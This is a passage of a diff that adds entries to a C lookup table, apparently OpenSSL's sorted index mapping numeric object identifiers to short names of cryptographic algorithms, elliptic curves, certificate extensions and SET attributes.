+ 9,	/* "PBE-MD2-DES" */
+168,	/* "PBE-MD2-RC2-64" */
+10,	/* "PBE-MD5-DES" */
+169,	/* "PBE-MD5-RC2-64" */
+147,	/* "PBE-SHA1-2DES" */
+146,	/* "PBE-SHA1-3DES" */
+170,	/* "PBE-SHA1-DES" */
+148,	/* "PBE-SHA1-RC2-128" */
+149,	/* "PBE-SHA1-RC2-40" */
+68,	/* "PBE-SHA1-RC2-64" */
+144,	/* "PBE-SHA1-RC4-128" */
+145,	/* "PBE-SHA1-RC4-40" */
+161,	/* "PBES2" */
+69,	/* "PBKDF2" */
+162,	/* "PBMAC1" */
+127,	/* "PKIX" */
+935,	/* "PSPECIFIED" */
+98,	/* "RC2-40-CBC" */
+166,	/* "RC2-64-CBC" */
+37,	/* "RC2-CBC" */
+39,	/* "RC2-CFB" */
+38,	/* "RC2-ECB" */
+40,	/* "RC2-OFB" */
+ 5,	/* "RC4" */
+97,	/* "RC4-40" */
+915,	/* "RC4-HMAC-MD5" */
+120,	/* "RC5-CBC" */
+122,	/* "RC5-CFB" */
+121,	/* "RC5-ECB" */
+123,	/* "RC5-OFB" */
+117,	/* "RIPEMD160" */
+124,	/* "RLE" */
+19,	/* "RSA" */
+ 7,	/* "RSA-MD2" */
+396,	/* "RSA-MD4" */
+ 8,	/* "RSA-MD5" */
+96,	/* "RSA-MDC2" */
+104,	/* "RSA-NP-MD5" */
+119,	/* "RSA-RIPEMD160" */
+42,	/* "RSA-SHA" */
+65,	/* "RSA-SHA1" */
+115,	/* "RSA-SHA1-2" */
+671,	/* "RSA-SHA224" */
+668,	/* "RSA-SHA256" */
+669,	/* "RSA-SHA384" */
+670,	/* "RSA-SHA512" */
+919,	/* "RSAES-OAEP" */
+912,	/* "RSASSA-PSS" */
+777,	/* "SEED-CBC" */
+779,	/* "SEED-CFB" */
+776,	/* "SEED-ECB" */
+778,	/* "SEED-OFB" */
+41,	/* "SHA" */
+64,	/* "SHA1" */
+675,	/* "SHA224" */
+672,	/* "SHA256" */
+673,	/* "SHA384" */
+674,	/* "SHA512" */
+188,	/* "SMIME" */
+167,	/* "SMIME-CAPS" */
+100,	/* "SN" */
+16,	/* "ST" */
+143,	/* "SXNetID" */
+458,	/* "UID" */
+ 0,	/* "UNDEF" */
+11,	/* "X500" */
+378,	/* "X500algorithms" */
+12,	/* "X509" */
+184,	/* "X9-57" */
+185,	/* "X9cm" */
+125,	/* "ZLIB" */
+478,	/* "aRecord" */
+289,	/* "aaControls" */
+287,	/* "ac-auditEntity" */
+397,	/* "ac-proxying" */
+288,	/* "ac-targeting" */
+368,	/* "acceptableResponses" */
+446,	/* "account" */
+363,	/* "ad_timestamping" */
+376,	/* "algorithm" */
+405,	/* "ansi-X9-62" */
+910,	/* "anyExtendedKeyUsage" */
+746,	/* "anyPolicy" */
+370,	/* "archiveCutoff" */
+484,	/* "associatedDomain" */
+485,	/* "associatedName" */
+501,	/* "audio" */
+177,	/* "authorityInfoAccess" */
+90,	/* "authorityKeyIdentifier" */
+882,	/* "authorityRevocationList" */
+87,	/* "basicConstraints" */
+365,	/* "basicOCSPResponse" */
+285,	/* "biometricInfo" */
+921,	/* "brainpoolP160r1" */
+922,	/* "brainpoolP160t1" */
+923,	/* "brainpoolP192r1" */
+924,	/* "brainpoolP192t1" */
+925,	/* "brainpoolP224r1" */
+926,	/* "brainpoolP224t1" */
+927,	/* "brainpoolP256r1" */
+928,	/* "brainpoolP256t1" */
+929,	/* "brainpoolP320r1" */
+930,	/* "brainpoolP320t1" */
+931,	/* "brainpoolP384r1" */
+932,	/* "brainpoolP384t1" */
+933,	/* "brainpoolP512r1" */
+934,	/* "brainpoolP512t1" */
+494,	/* "buildingName" */
+860,	/* "businessCategory" */
+691,	/* "c2onb191v4" */
+692,	/* "c2onb191v5" */
+697,	/* "c2onb239v4" */
+698,	/* "c2onb239v5" */
+684,	/* "c2pnb163v1" */
+685,	/* "c2pnb163v2" */
+686,	/* "c2pnb163v3" */
+687,	/* "c2pnb176v1" */
+693,	/* "c2pnb208w1" */
+699,	/* "c2pnb272w1" */
+700,	/* "c2pnb304w1" */
+702,	/* "c2pnb368w1" */
+688,	/* "c2tnb191v1" */
+689,	/* "c2tnb191v2" */
+690,	/* "c2tnb191v3" */
+694,	/* "c2tnb239v1" */
+695,	/* "c2tnb239v2" */
+696,	/* "c2tnb239v3" */
+701,	/* "c2tnb359v1" */
+703,	/* "c2tnb431r1" */
+881,	/* "cACertificate" */
+483,	/* "cNAMERecord" */
+179,	/* "caIssuers" */
+785,	/* "caRepository" */
+443,	/* "caseIgnoreIA5StringSyntax" */
+152,	/* "certBag" */
+677,	/* "certicom-arc" */
+771,	/* "certificateIssuer" */
+89,	/* "certificatePolicies" */
+883,	/* "certificateRevocationList" */
+54,	/* "challengePassword" */
+407,	/* "characteristic-two-field" */
+395,	/* "clearance" */
+130,	/* "clientAuth" */
+131,	/* "codeSigning" */
+50,	/* "contentType" */
+53,	/* "countersignature" */
+153,	/* "crlBag" */
+103,	/* "crlDistributionPoints" */
+88,	/* "crlNumber" */
+884,	/* "crossCertificatePair" */
+806,	/* "cryptocom" */
+805,	/* "cryptopro" */
+954,	/* "ct_cert_scts" */
+952,	/* "ct_precert_poison" */
+951,	/* "ct_precert_scts" */
+953,	/* "ct_precert_signer" */
+500,	/* "dITRedirect" */
+451,	/* "dNSDomain" */
+495,	/* "dSAQuality" */
+434,	/* "data" */
+390,	/* "dcobject" */
+140,	/* "deltaCRL" */
+891,	/* "deltaRevocationList" */
+107,	/* "description" */
+871,	/* "destinationIndicator" */
+947,	/* "dh-cofactor-kdf" */
+946,	/* "dh-std-kdf" */
+28,	/* "dhKeyAgreement" */
+941,	/* "dhSinglePass-cofactorDH-sha1kdf-scheme" */
+942,	/* "dhSinglePass-cofactorDH-sha224kdf-scheme" */
+943,	/* "dhSinglePass-cofactorDH-sha256kdf-scheme" */
+944,	/* "dhSinglePass-cofactorDH-sha384kdf-scheme" */
+945,	/* "dhSinglePass-cofactorDH-sha512kdf-scheme" */
+936,	/* "dhSinglePass-stdDH-sha1kdf-scheme" */
+937,	/* "dhSinglePass-stdDH-sha224kdf-scheme" */
+938,	/* "dhSinglePass-stdDH-sha256kdf-scheme" */
+939,	/* "dhSinglePass-stdDH-sha384kdf-scheme" */
+940,	/* "dhSinglePass-stdDH-sha512kdf-scheme" */
+920,	/* "dhpublicnumber" */
+382,	/* "directory" */
+887,	/* "distinguishedName" */
+892,	/* "dmdName" */
+174,	/* "dnQualifier" */
+447,	/* "document" */
+471,	/* "documentAuthor" */
+468,	/* "documentIdentifier" */
+472,	/* "documentLocation" */
+502,	/* "documentPublisher" */
+449,	/* "documentSeries" */
+469,	/* "documentTitle" */
+470,	/* "documentVersion" */
+392,	/* "domain" */
+452,	/* "domainRelatedObject" */
+802,	/* "dsa_with_SHA224" */
+803,	/* "dsa_with_SHA256" */
+791,	/* "ecdsa-with-Recommended" */
+416,	/* "ecdsa-with-SHA1" */
+793,	/* "ecdsa-with-SHA224" */
+794,	/* "ecdsa-with-SHA256" */
+795,	/* "ecdsa-with-SHA384" */
+796,	/* "ecdsa-with-SHA512" */
+792,	/* "ecdsa-with-Specified" */
+48,	/* "emailAddress" */
+132,	/* "emailProtection" */
+885,	/* "enhancedSearchGuide" */
+389,	/* "enterprises" */
+384,	/* "experimental" */
+172,	/* "extReq" */
+56,	/* "extendedCertificateAttributes" */
+126,	/* "extendedKeyUsage" */
+372,	/* "extendedStatus" */
+867,	/* "facsimileTelephoneNumber" */
+462,	/* "favouriteDrink" */
+857,	/* "freshestCRL" */
+453,	/* "friendlyCountry" */
+490,	/* "friendlyCountryName" */
+156,	/* "friendlyName" */
+509,	/* "generationQualifier" */
+815,	/* "gost-mac" */
+811,	/* "gost2001" */
+851,	/* "gost2001cc" */
+813,	/* "gost89" */
+814,	/* "gost89-cnt" */
+812,	/* "gost94" */
+850,	/* "gost94cc" */
+797,	/* "hmacWithMD5" */
+163,	/* "hmacWithSHA1" */
+798,	/* "hmacWithSHA224" */
+799,	/* "hmacWithSHA256" */
+800,	/* "hmacWithSHA384" */
+801,	/* "hmacWithSHA512" */
+432,	/* "holdInstructionCallIssuer" */
+430,	/* "holdInstructionCode" */
+431,	/* "holdInstructionNone" */
+433,	/* "holdInstructionReject" */
+486,	/* "homePostalAddress" */
+473,	/* "homeTelephoneNumber" */
+466,	/* "host" */
+889,	/* "houseIdentifier" */
+442,	/* "iA5StringSyntax" */
+783,	/* "id-DHBasedMac" */
+824,	/* "id-Gost28147-89-CryptoPro-A-ParamSet" */
+825,	/* "id-Gost28147-89-CryptoPro-B-ParamSet" */
+826,	/* "id-Gost28147-89-CryptoPro-C-ParamSet" */
+827,	/* "id-Gost28147-89-CryptoPro-D-ParamSet" */
+819,	/* "id-Gost28147-89-CryptoPro-KeyMeshing" */
+829,	/* "id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet" */
+828,	/* "id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet" */
+830,	/* "id-Gost28147-89-CryptoPro-RIC-1-ParamSet" */
+820,	/* "id-Gost28147-89-None-KeyMeshing" */
+823,	/* "id-Gost28147-89-TestParamSet" */
+849,	/* "id-Gost28147-89-cc" */
+840,	/* "id-GostR3410-2001-CryptoPro-A-ParamSet" */
+841,	/* "id-GostR3410-2001-CryptoPro-B-ParamSet" */
+842,	/* "id-GostR3410-2001-CryptoPro-C-ParamSet" */
+843,	/* "id-GostR3410-2001-CryptoPro-XchA-ParamSet" */
+844,	/* "id-GostR3410-2001-CryptoPro-XchB-ParamSet" */
+854,	/* "id-GostR3410-2001-ParamSet-cc" */
+839,	/* "id-GostR3410-2001-TestParamSet" */
+817,	/* "id-GostR3410-2001DH" */
+832,	/* "id-GostR3410-94-CryptoPro-A-ParamSet" */
+833,	/* "id-GostR3410-94-CryptoPro-B-ParamSet" */
+834,	/* "id-GostR3410-94-CryptoPro-C-ParamSet" */
+835,	/* "id-GostR3410-94-CryptoPro-D-ParamSet" */
+836,	/* "id-GostR3410-94-CryptoPro-XchA-ParamSet" */
+837,	/* "id-GostR3410-94-CryptoPro-XchB-ParamSet" */
+838,	/* "id-GostR3410-94-CryptoPro-XchC-ParamSet" */
+831,	/* "id-GostR3410-94-TestParamSet" */
+845,	/* "id-GostR3410-94-a" */
+846,	/* "id-GostR3410-94-aBis" */
+847,	/* "id-GostR3410-94-b" */
+848,	/* "id-GostR3410-94-bBis" */
+818,	/* "id-GostR3410-94DH" */
+822,	/* "id-GostR3411-94-CryptoProParamSet" */
+821,	/* "id-GostR3411-94-TestParamSet" */
+807,	/* "id-GostR3411-94-with-GostR3410-2001" */
+853,	/* "id-GostR3411-94-with-GostR3410-2001-cc" */
+808,	/* "id-GostR3411-94-with-GostR3410-94" */
+852,	/* "id-GostR3411-94-with-GostR3410-94-cc" */
+810,	/* "id-HMACGostR3411-94" */
+782,	/* "id-PasswordBasedMAC" */
+266,	/* "id-aca" */
+355,	/* "id-aca-accessIdentity" */
+354,	/* "id-aca-authenticationInfo" */
+356,	/* "id-aca-chargingIdentity" */
+399,	/* "id-aca-encAttrs" */
+357,	/* "id-aca-group" */
+358,	/* "id-aca-role" */
+176,	/* "id-ad" */
+896,	/* "id-aes128-CCM" */
+895,	/* "id-aes128-GCM" */
+788,	/* "id-aes128-wrap" */
+897,	/* "id-aes128-wrap-pad" */
+899,	/* "id-aes192-CCM" */
+898,	/* "id-aes192-GCM" */
+789,	/* "id-aes192-wrap" */
+900,	/* "id-aes192-wrap-pad" */
+902,	/* "id-aes256-CCM" */
+901,	/* "id-aes256-GCM" */
+790,	/* "id-aes256-wrap" */
+903,	/* "id-aes256-wrap-pad" */
+262,	/* "id-alg" */
+893,	/* "id-alg-PWRI-KEK" */
+323,	/* "id-alg-des40" */
+326,	/* "id-alg-dh-pop" */
+325,	/* "id-alg-dh-sig-hmac-sha1" */
+324,	/* "id-alg-noSignature" */
+907,	/* "id-camellia128-wrap" */
+908,	/* "id-camellia192-wrap" */
+909,	/* "id-camellia256-wrap" */
+268,	/* "id-cct" */
+361,	/* "id-cct-PKIData" */
+362,	/* "id-cct-PKIResponse" */
+360,	/* "id-cct-crs" */
+81,	/* "id-ce" */
+680,	/* "id-characteristic-two-basis" */
+263,	/* "id-cmc" */
+334,	/* "id-cmc-addExtensions" */
+346,	/* "id-cmc-confirmCertAcceptance" */
+330,	/* "id-cmc-dataReturn" */
+336,	/* "id-cmc-decryptedPOP" */
+335,	/* "id-cmc-encryptedPOP" */
+339,	/* "id-cmc-getCRL" */
+338,	/* "id-cmc-getCert" */
+328,	/* "id-cmc-identification" */
+329,	/* "id-cmc-identityProof" */
+337,	/* "id-cmc-lraPOPWitness" */
+344,	/* "id-cmc-popLinkRandom" */
+345,	/* "id-cmc-popLinkWitness" */
+343,	/* "id-cmc-queryPending" */
+333,	/* "id-cmc-recipientNonce" */
+341,	/* "id-cmc-regInfo" */
+342,	/* "id-cmc-responseInfo" */
+340,	/* "id-cmc-revokeRequest" */
+332,	/* "id-cmc-senderNonce" */
+327,	/* "id-cmc-statusInfo" */
+331,	/* "id-cmc-transactionId" */
+787,	/* "id-ct-asciiTextWithCRLF" */
+408,	/* "id-ecPublicKey" */
+508,	/* "id-hex-multipart-message" */
+507,	/* "id-hex-partial-message" */
+260,	/* "id-it" */
+302,	/* "id-it-caKeyUpdateInfo" */
+298,	/* "id-it-caProtEncCert" */
+311,	/* "id-it-confirmWaitTime" */
+303,	/* "id-it-currentCRL" */
+300,	/* "id-it-encKeyPairTypes" */
+310,	/* "id-it-implicitConfirm" */
+308,	/* "id-it-keyPairParamRep" */
+307,	/* "id-it-keyPairParamReq" */
+312,	/* "id-it-origPKIMessage" */
+301,	/* "id-it-preferredSymmAlg" */
+309,	/* "id-it-revPassphrase" */
+299,	/* "id-it-signKeyPairTypes" */
+305,	/* "id-it-subscriptionRequest" */
+306,	/* "id-it-subscriptionResponse" */
+784,	/* "id-it-suppLangTags" */
+304,	/* "id-it-unsupportedOIDs" */
+128,	/* "id-kp" */
+280,	/* "id-mod-attribute-cert" */
+274,	/* "id-mod-cmc" */
+277,	/* "id-mod-cmp" */
+284,	/* "id-mod-cmp2000" */
+273,	/* "id-mod-crmf" */
+283,	/* "id-mod-dvcs" */
+275,	/* "id-mod-kea-profile-88" */
+276,	/* "id-mod-kea-profile-93" */
+282,	/* "id-mod-ocsp" */
+278,	/* "id-mod-qualified-cert-88" */
+279,	/* "id-mod-qualified-cert-93" */
+281,	/* "id-mod-timestamp-protocol" */
+264,	/* "id-on" */
+858,	/* "id-on-permanentIdentifier" */
+347,	/* "id-on-personalData" */
+265,	/* "id-pda" */
+352,	/* "id-pda-countryOfCitizenship" */
+353,	/* "id-pda-countryOfResidence" */
+348,	/* "id-pda-dateOfBirth" */
+351,	/* "id-pda-gender" */
+349,	/* "id-pda-placeOfBirth" */
+175,	/* "id-pe" */
+261,	/* "id-pkip" */
+258,	/* "id-pkix-mod" */
+269,	/* "id-pkix1-explicit-88" */
+271,	/* "id-pkix1-explicit-93" */
+270,	/* "id-pkix1-implicit-88" */
+272,	/* "id-pkix1-implicit-93" */
+662,	/* "id-ppl" */
+664,	/* "id-ppl-anyLanguage" */
+667,	/* "id-ppl-independent" */
+665,	/* "id-ppl-inheritAll" */
+267,	/* "id-qcs" */
+359,	/* "id-qcs-pkixQCSyntax-v1" */
+259,	/* "id-qt" */
+164,	/* "id-qt-cps" */
+165,	/* "id-qt-unotice" */
+313,	/* "id-regCtrl" */
+316,	/* "id-regCtrl-authenticator" */
+319,	/* "id-regCtrl-oldCertID" */
+318,	/* "id-regCtrl-pkiArchiveOptions" */
+317,	/* "id-regCtrl-pkiPublicationInfo" */
+320,	/* "id-regCtrl-protocolEncrKey" */
+315,	/* "id-regCtrl-regToken" */
+314,	/* "id-regInfo" */
+322,	/* "id-regInfo-certReq" */
+321,	/* "id-regInfo-utf8Pairs" */
+512,	/* "id-set" */
+191,	/* "id-smime-aa" */
+215,	/* "id-smime-aa-contentHint" */
+218,	/* "id-smime-aa-contentIdentifier" */
+221,	/* "id-smime-aa-contentReference" */
+240,	/* "id-smime-aa-dvcs-dvc" */
+217,	/* "id-smime-aa-encapContentType" */
+222,	/* "id-smime-aa-encrypKeyPref" */
+220,	/* "id-smime-aa-equivalentLabels" */
+232,	/* "id-smime-aa-ets-CertificateRefs" */
+233,	/* "id-smime-aa-ets-RevocationRefs" */
+238,	/* "id-smime-aa-ets-archiveTimeStamp" */
+237,	/* "id-smime-aa-ets-certCRLTimestamp" */
+234,	/* "id-smime-aa-ets-certValues" */
+227,	/* "id-smime-aa-ets-commitmentType" */
+231,	/* "id-smime-aa-ets-contentTimestamp" */
+236,	/* "id-smime-aa-ets-escTimeStamp" */
+230,	/* "id-smime-aa-ets-otherSigCert" */
+235,	/* "id-smime-aa-ets-revocationValues" */
+226,	/* "id-smime-aa-ets-sigPolicyId" */
+229,	/* "id-smime-aa-ets-signerAttr" */
+228,	/* "id-smime-aa-ets-signerLocation" */
+219,	/* "id-smime-aa-macValue" */
+214,	/* "id-smime-aa-mlExpandHistory" */
+216,	/* "id-smime-aa-msgSigDigest" */
+212,	/* "id-smime-aa-receiptRequest" */
+213,	/* "id-smime-aa-securityLabel" */
+239,	/* "id-smime-aa-signatureType" */
+223,	/* "id-smime-aa-signingCertificate" */
+224,	/* "id-smime-aa-smimeEncryptCerts" */
+225,	/* "id-smime-aa-timeStampToken" */
+192,	/* "id-smime-alg" */
+243,	/* "id-smime-alg-3DESwrap" */
+246,	/* "id-smime-alg-CMS3DESwrap" */
+247,	/* "id-smime-alg-CMSRC2wrap" */
+245,	/* "id-smime-alg-ESDH" */
+241,	/* "id-smime-alg-ESDHwith3DES" */
+242,	/* "id-smime-alg-ESDHwithRC2" */
+244,	/* "id-smime-alg-RC2wrap" */
+193,	/* "id-smime-cd" */
+248,	/* "id-smime-cd-ldap" */
+190,	/* "id-smime-ct" */
+210,	/* "id-smime-ct-DVCSRequestData" */
+211,	/* "id-smime-ct-DVCSResponseData" */
+208,	/* "id-smime-ct-TDTInfo" */
+207,	/* "id-smime-ct-TSTInfo" */
+205,	/* "id-smime-ct-authData" */
+786,	/* "id-smime-ct-compressedData" */
+209,	/* "id-smime-ct-contentInfo" */
+206,	/* "id-smime-ct-publishCert" */
+204,	/* "id-smime-ct-receipt" */
+195,	/* "id-smime-cti" */
+255,	/* "id-smime-cti-ets-proofOfApproval" */
+256,	/* "id-smime-cti-ets-proofOfCreation" */
+253,	/* "id-smime-cti-ets-proofOfDelivery" */
+251,	/* "id-smime-cti-ets-proofOfOrigin" */
+252,	/* "id-smime-cti-ets-proofOfReceipt" */
+254,	/* "id-smime-cti-ets-proofOfSender" */
+189,	/* "id-smime-mod" */
+196,	/* "id-smime-mod-cms" */
+197,	/* "id-smime-mod-ess" */
+202,	/* "id-smime-mod-ets-eSigPolicy-88" */
+203,	/* "id-smime-mod-ets-eSigPolicy-97" */
+200,	/* "id-smime-mod-ets-eSignature-88" */
+201,	/* "id-smime-mod-ets-eSignature-97" */
+199,	/* "id-smime-mod-msg-v3" */
+198,	/* "id-smime-mod-oid" */
+194,	/* "id-smime-spq" */
+250,	/* "id-smime-spq-ets-sqt-unotice" */
+249,	/* "id-smime-spq-ets-sqt-uri" */
+676,	/* "identified-organization" */
+461,	/* "info" */
+748,	/* "inhibitAnyPolicy" */
+101,	/* "initials" */
+647,	/* "international-organizations" */
+869,	/* "internationaliSDNNumber" */
+142,	/* "invalidityDate" */
+294,	/* "ipsecEndSystem" */
+295,	/* "ipsecTunnel" */
+296,	/* "ipsecUser" */
+86,	/* "issuerAltName" */
+770,	/* "issuingDistributionPoint" */
+492,	/* "janetMailbox" */
+957,	/* "jurisdictionC" */
+955,	/* "jurisdictionL" */
+956,	/* "jurisdictionST" */
+150,	/* "keyBag" */
+83,	/* "keyUsage" */
+477,	/* "lastModifiedBy" */
+476,	/* "lastModifiedTime" */
+157,	/* "localKeyID" */
+480,	/* "mXRecord" */
+460,	/* "mail" */
+493,	/* "mailPreferenceOption" */
+467,	/* "manager" */
+809,	/* "md_gost94" */
+875,	/* "member" */
+182,	/* "member-body" */
+51,	/* "messageDigest" */
+383,	/* "mgmt" */
+504,	/* "mime-mhs" */
+506,	/* "mime-mhs-bodies" */
+505,	/* "mime-mhs-headings" */
+488,	/* "mobileTelephoneNumber" */
+136,	/* "msCTLSign" */
+135,	/* "msCodeCom" */
+134,	/* "msCodeInd" */
+138,	/* "msEFS" */
+171,	/* "msExtReq" */
+137,	/* "msSGC" */
+648,	/* "msSmartcardLogin" */
+649,	/* "msUPN" */
+481,	/* "nSRecord" */
+173,	/* "name" */
+666,	/* "nameConstraints" */
+369,	/* "noCheck" */
+403,	/* "noRevAvail" */
+72,	/* "nsBaseUrl" */
+76,	/* "nsCaPolicyUrl" */
+74,	/* "nsCaRevocationUrl" */
+58,	/* "nsCertExt" */
+79,	/* "nsCertSequence" */
+71,	/* "nsCertType" */
+78,	/* "nsComment" */
+59,	/* "nsDataType" */
+75,	/* "nsRenewalUrl" */
+73,	/* "nsRevocationUrl" */
+139,	/* "nsSGC" */
+77,	/* "nsSslServerName" */
+681,	/* "onBasis" */
+491,	/* "organizationalStatus" */
+475,	/* "otherMailbox" */
+876,	/* "owner" */
+489,	/* "pagerTelephoneNumber" */
+374,	/* "path" */
+112,	/* "pbeWithMD5AndCast5CBC" */
+499,	/* "personalSignature" */
+487,	/* "personalTitle" */
+464,	/* "photo" */
+863,	/* "physicalDeliveryOfficeName" */
+437,	/* "pilot" */
+439,	/* "pilotAttributeSyntax" */
+438,	/* "pilotAttributeType" */
+479,	/* "pilotAttributeType27" */
+456,	/* "pilotDSA" */
+441,	/* "pilotGroups" */
+444,	/* "pilotObject" */
+440,	/* "pilotObjectClass" */
+455,	/* "pilotOrganization" */
+445,	/* "pilotPerson" */
+ 2,	/* "pkcs" */
+186,	/* "pkcs1" */
+27,	/* "pkcs3" */
+187,	/* "pkcs5" */
+20,	/* "pkcs7" */
+21,	/* "pkcs7-data" */
+25,	/* "pkcs7-digestData" */
+26,	/* "pkcs7-encryptedData" */
+23,	/* "pkcs7-envelopedData" */
+24,	/* "pkcs7-signedAndEnvelopedData" */
+22,	/* "pkcs7-signedData" */
+151,	/* "pkcs8ShroudedKeyBag" */
+47,	/* "pkcs9" */
+401,	/* "policyConstraints" */
+747,	/* "policyMappings" */
+862,	/* "postOfficeBox" */
+861,	/* "postalAddress" */
+661,	/* "postalCode" */
+683,	/* "ppBasis" */
+872,	/* "preferredDeliveryMethod" */
+873,	/* "presentationAddress" */
+816,	/* "prf-gostr3411-94" */
+406,	/* "prime-field" */
+409,	/* "prime192v1" */
+410,	/* "prime192v2" */
+411,	/* "prime192v3" */
+412,	/* "prime239v1" */
+413,	/* "prime239v2" */
+414,	/* "prime239v3" */
+415,	/* "prime256v1" */
+385,	/* "private" */
+84,	/* "privateKeyUsagePeriod" */
+886,	/* "protocolInformation" */
+663,	/* "proxyCertInfo" */
+510,	/* "pseudonym" */
+435,	/* "pss" */
+286,	/* "qcStatements" */
+457,	/* "qualityLabelledData" */
+450,	/* "rFC822localPart" */
+870,	/* "registeredAddress" */
+400,	/* "role" */
+877,	/* "roleOccupant" */
+448,	/* "room" */
+463,	/* "roomNumber" */
+ 6,	/* "rsaEncryption" */
+644,	/* "rsaOAEPEncryptionSET" */
+377,	/* "rsaSignature" */
+ 1,	/* "rsadsi" */
+482,	/* "sOARecord" */
+155,	/* "safeContentsBag" */
+291,	/* "sbgp-autonomousSysNum" */
+290,	/* "sbgp-ipAddrBlock" */
+292,	/* "sbgp-routerIdentifier" */
+159,	/* "sdsiCertificate" */
+859,	/* "searchGuide" */
+704,	/* "secp112r1" */
+705,	/* "secp112r2" */
+706,	/* "secp128r1" */
+707,	/* "secp128r2" */
+708,	/* "secp160k1" */
+709,	/* "secp160r1" */
+710,	/* "secp160r2" */
+711,	/* "secp192k1" */
+712,	/* "secp224k1" */
+713,	/* "secp224r1" */
+714,	/* "secp256k1" */
+715,	/* "secp384r1" */
+716,	/* "secp521r1" */
+154,	/* "secretBag" */
+474,	/* "secretary" */
+717,	/* "sect113r1" */
+718,	/* "sect113r2" */
+719,	/* "sect131r1" */
+720,	/* "sect131r2" */
+721,	/* "sect163k1" */
+722,	/* "sect163r1" */
+723,	/* "sect163r2" */
+724,	/* "sect193r1" */
+725,	/* "sect193r2" */
+726,	/* "sect233k1" */
+727,	/* "sect233r1" */
+728,	/* "sect239k1" */
+729,	/* "sect283k1" */
+730,	/* "sect283r1" */
+731,	/* "sect409k1" */
+732,	/* "sect409r1" */
+733,	/* "sect571k1" */
+734,	/* "sect571r1" */
+386,	/* "security" */
+878,	/* "seeAlso" */
+394,	/* "selected-attribute-types" */
+105,	/* "serialNumber" */
+129,	/* "serverAuth" */
+371,	/* "serviceLocator" */
+625,	/* "set-addPolicy" */
+515,	/* "set-attr" */
+518,	/* "set-brand" */
+638,	/* "set-brand-AmericanExpress" */
+637,	/* "set-brand-Diners" */
+636,	/* "set-brand-IATA-ATA" */
+639,	/* "set-brand-JCB" */
+641,	/* "set-brand-MasterCard" */
+642,	/* "set-brand-Novus" */
+640,	/* "set-brand-Visa" */
+517,	/* "set-certExt" */
+513,	/* "set-ctype" */
+514,	/* "set-msgExt" */
+516,	/* "set-policy" */
+607,	/* "set-policy-root" */
+624,	/* "set-rootKeyThumb" */
+620,	/* "setAttr-Cert" */
+631,	/* "setAttr-GenCryptgrm" */
+623,	/* "setAttr-IssCap" */
+628,	/* "setAttr-IssCap-CVM" */
+630,	/* "setAttr-IssCap-Sig" */
+629,	/* "setAttr-IssCap-T2" */
+621,	/* "setAttr-PGWYcap" */
+635,	/* "setAttr-SecDevSig" */
+632,	/* "setAttr-T2Enc" */
+633,	/* "setAttr-T2cleartxt" */
+634,	/* "setAttr-TokICCsig" */
+627,	/* "setAttr-Token-B0Prime" */
+626,	/* "setAttr-Token-EMV" */
+622,	/* "setAttr-TokenType" */
+619,	/* "setCext-IssuerCapabilities" */
+615,	/* "setCext-PGWYcapabilities" */
+616,	/* "setCext-TokenIdentifier" */
+618,	/* "setCext-TokenType" */
+617,	/* "setCext-Track2Data" */
+611,	/* "setCext-cCertRequired" */
+609,	/* "setCext-certType" */
+608,	/* "setCext-hashedRoot" */
+610,	/* "setCext-merchData" */
+613,	/* "setCext-setExt" */
+614,	/* "setCext-setQualf" */
+612,	/* "setCext-tunneling" */
+540,	/* "setct-AcqCardCodeMsg" */
+576,	/* "setct-AcqCardCodeMsgTBE" */
+570,	/* "setct-AuthReqTBE" */
+534,	/* "setct-AuthReqTBS" */
+527,	/* "setct-AuthResBaggage" */
+571,	/* "setct-AuthResTBE" */
+572,	/* "setct-AuthResTBEX" */
+535,	/* "setct-AuthResTBS" */
+536,	/* "setct-AuthResTBSX" */
+528,	/* "setct-AuthRevReqBaggage" */
+577,	/* "setct-AuthRevReqTBE" */
+541,	/* "setct-AuthRevReqTBS" */
+529,	/* "setct-AuthRevResBaggage" */
+542,	/* "setct-AuthRevResData" */
+578,	/* "setct-AuthRevResTBE" */
+579,	/* "setct-AuthRevResTBEB" */
+543,	/* "setct-AuthRevResTBS" */
+573,	/* "setct-AuthTokenTBE" */
+537,	/* "setct-AuthTokenTBS" */
+600,	/* "setct-BCIDistributionTBS" */
+558,	/* "setct-BatchAdminReqData" */
+592,	/* "setct-BatchAdminReqTBE" */
+559,	/* "setct-BatchAdminResData" */
+593,	/* "setct-BatchAdminResTBE" */
+599,	/* "setct-CRLNotificationResTBS" */
+598,	/* "setct-CRLNotificationTBS" */
+580,	/* "setct-CapReqTBE" */
+581,	/* "setct-CapReqTBEX" */
+544,	/* "setct-CapReqTBS" */
+545,	/* "setct-CapReqTBSX" */
+546,	/* "setct-CapResData" */
+582,	/* "setct-CapResTBE" */
+583,	/* "setct-CapRevReqTBE" */
+584,	/* "setct-CapRevReqTBEX" */
+547,	/* "setct-CapRevReqTBS" */
+548,	/* "setct-CapRevReqTBSX" */
+549,	/* "setct-CapRevResData" */
+585,	/* "setct-CapRevResTBE" */
+538,	/* "setct-CapTokenData" */
+530,	/* "setct-CapTokenSeq" */
+574,	/* "setct-CapTokenTBE" */
+575,	/* "setct-CapTokenTBEX" */
+539,	/* "setct-CapTokenTBS" */
+560,	/* "setct-CardCInitResTBS" */
+566,	/* "setct-CertInqReqTBS" */
+563,	/* "setct-CertReqData" */
+595,	/* "setct-CertReqTBE" */
+596,	/* "setct-CertReqTBEX" */
+564,	/* "setct-CertReqTBS" */
+565,	/* "setct-CertResData" */
+597,	/* "setct-CertResTBE" */
+586,	/* "setct-CredReqTBE" */
+587,	/* "setct-CredReqTBEX" */
+550,	/* "setct-CredReqTBS" */
+551,	/* "setct-CredReqTBSX" */
+552,	/* "setct-CredResData" */
+588,	/* "setct-CredResTBE" */
+589,	/* "setct-CredRevReqTBE" */
+590,	/* "setct-CredRevReqTBEX" */
+553,	/* "setct-CredRevReqTBS" */
+554,	/* "setct-CredRevReqTBSX" */
+555,	/* "setct-CredRevResData" */
+591,	/* "setct-CredRevResTBE" */
+567,	/* "setct-ErrorTBS" */
+526,	/* "setct-HODInput" */
+561,	/* "setct-MeAqCInitResTBS" */
+522,	/* "setct-OIData" */
+519,	/* "setct-PANData" */
+521,	/* "setct-PANOnly" */
+520,	/* "setct-PANToken" */
+556,	/* "setct-PCertReqData" */
+557,	/* "setct-PCertResTBS" */
+523,	/* "setct-PI" */
+532,	/* "setct-PI-TBS" */
+524,	/* "setct-PIData" */
+525,	/* "setct-PIDataUnsigned" */
+568,	/* "setct-PIDualSignedTBE" */
+569,	/* "setct-PIUnsignedTBE" */
